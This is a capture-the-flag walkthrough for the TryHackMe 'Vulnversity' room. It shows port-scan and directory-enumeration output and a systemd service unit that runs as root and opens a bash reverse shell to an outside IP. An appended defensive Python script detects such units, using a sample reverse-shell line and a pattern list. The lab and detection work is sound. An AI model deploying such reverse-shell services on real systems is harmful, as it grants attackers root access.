VulnUniversity

Room Link: https://tryhackme.com/room/vulnversity

Tools

Deploy the machine

Reconnaissance

Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 09:55 IST
Nmap scan report for 10.10.135.130
Host is up (0.20s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds

Locating directories using Gobuster

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.65.81:3333
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/wordlist/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 318] [--> http://10.10.65.81:3333/images/]
/css                  (Status: 301) [Size: 315] [--> http://10.10.65.81:3333/css/]
/js                   (Status: 301) [Size: 314] [--> http://10.10.65.81:3333/js/]
/fonts                (Status: 301) [Size: 317] [--> http://10.10.65.81:3333/fonts/]
/internal             (Status: 301) [Size: 320] [--> http://10.10.65.81:3333/internal/]
Progress: 9932 / 1273834 (0.78%)

Compromise the Webserver

Privilege Escalation

[Unit]
Description=ZishanAdThandar

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.102.105/1337 0>&1'

[Install]
WantedBy=multi-user.target
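
Added example, not part of the original writeup: a defender-side audit for unit files like the one above. It parses a systemd unit and flags Exec* lines that use bash /dev/tcp or /dev/udp redirection or start an interactive shell, and reports the account the service runs as. The sample units, pattern list and function names are constructed for illustration, and 192.0.2.10 is a documentation placeholder address.

```python
import re

# Constructed samples; the first mirrors the shape of the unit shown above.
SUSPICIOUS_UNIT = """\
[Unit]
Description=example

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/1337 0>&1'
"""

BENIGN_UNIT = """\
[Service]
User=www-data
ExecStart=/usr/bin/python3 /srv/app/server.py
"""

EXEC_KEYS = {"ExecStart", "ExecStartPre", "ExecStartPost", "ExecStop", "ExecReload"}
PATTERNS = {  # assumed starting set, extend for your environment
    "bash network redirection": re.compile(r"/dev/(tcp|udp)/"),
    "interactive shell in a service": re.compile(r"\b(ba|da|z)?sh\s+-i\b"),
}

def parse_unit(text):
    """Return [(section, key, value)], keeping repeated keys such as ExecStart."""
    section, entries = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif "=" in line and section:
            key, value = line.split("=", 1)
            entries.append((section, key.strip(), value.strip()))
    return entries

def audit_unit(text):
    """Flag Exec* lines matching PATTERNS and report the account they run as."""
    entries = parse_unit(text)
    # systemd system services run as root when User= is absent
    user = next((v for s, k, v in entries if s == "Service" and k == "User"), "root")
    return [{"key": k, "user": user, "reason": reason}
            for s, k, v in entries if s == "Service" and k in EXEC_KEYS
            for reason, rx in PATTERNS.items() if rx.search(v)]
```

Run audit_unit() over the contents of each file in the system unit directories and review any finding whose user is root first.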

Author: Zishan Ahamed Thandar